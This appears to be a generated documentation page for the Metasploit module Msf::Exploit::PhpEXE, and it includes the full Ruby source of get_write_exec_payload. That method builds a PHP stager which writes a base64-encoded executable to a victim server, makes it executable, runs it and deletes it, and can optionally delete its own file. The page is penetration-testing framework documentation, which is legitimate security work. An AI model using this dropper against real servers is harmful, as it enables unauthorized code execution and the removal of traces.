Module: Msf::Exploit::PhpEXE

Includes:
EXE, Payload::Php
Defined in:
lib/msf/core/exploit/php_exe.rb

Instance Method Summary collapse

Methods included from Payload::Php

#php_preamble, #php_system_block

Methods included from EXE

#exe_init_options, #exe_post_generation, #generate_payload_dccw_gdiplus_dll, #generate_payload_dll, #generate_payload_exe, #generate_payload_exe_service, #generate_payload_msi, #get_custom_exe, #get_eicar_exe, #initialize

Instance Method Details

#get_write_exec_payload(opts = {}) ⇒ String

TODO:

Test on Windows

Generate a first-stage php payload.

For ARCH_PHP targets, simply returns payload.encoded wrapped in <?php ?> markers.

For target architectures other than ARCH_PHP, this will base64 encode an appropriate executable and drop it on the target system. After running it, the generated code will attempt to unlink the dropped executable which will certainly fail on Windows.

Parameters:

  • opts (Hash) (defaults to: {})

    a customizable set of options

Options Hash (opts):

  • :writable_path (String)

    A path on the victim where we can write an executable. Uses current directory if not given.

  • :unlink_self (Boolean)

    Whether to call unlink(__FILE__); in the payload. Good idea for arbitrary-file-upload vulns, bad idea for write-to-a-config-file vulns

Returns:

  • (String)

    A PHP payload that will drop an executable for non-php target architectures



36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
 
# File 'lib/msf/core/exploit/php_exe.rb', line 36

def get_write_exec_payload(opts={})
  case target_arch.first
  when ARCH_PHP
    php = payload.encoded
  else
    bin_name = Rex::Text.rand_text_alpha(8)
    if opts[:writable_path]
      bin_name = [opts[:writable_path], bin_name].join("/")
    else
      bin_name = "./#{bin_name}"
    end
    if target["Platform"] == 'win'
      bin_name << ".exe"
      print_warning("Unable to clean up #{bin_name}, delete it manually")
    end
    p = Rex::Text.encode_base64(generate_payload_exe)
    php = %Q{
    #{php_preamble}
    $ex = "#{bin_name}";
    $f = fopen($ex, "wb");
    fwrite($f, base64_decode("#{p}"));
    fclose($f);
    chmod($ex, 0777);
    function my_cmd($cmd) {
    #{php_system_block};
    }
    if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {
      my_cmd($ex . "&");
    } else {
      my_cmd($ex);
    }
    unlink($ex);
    }
  end

  if opts[:unlink_self]
    # Prepend instead of appending to make sure it happens no matter
    # what the payload normally does.
    php = "@unlink(__FILE__);" + php
  end

  php.gsub!(/#.*$/, '')
  php.gsub!(/[\t ]+/, ' ')
  php.gsub!(/\n/, ' ')
  return "<?php #{php} ?>"
end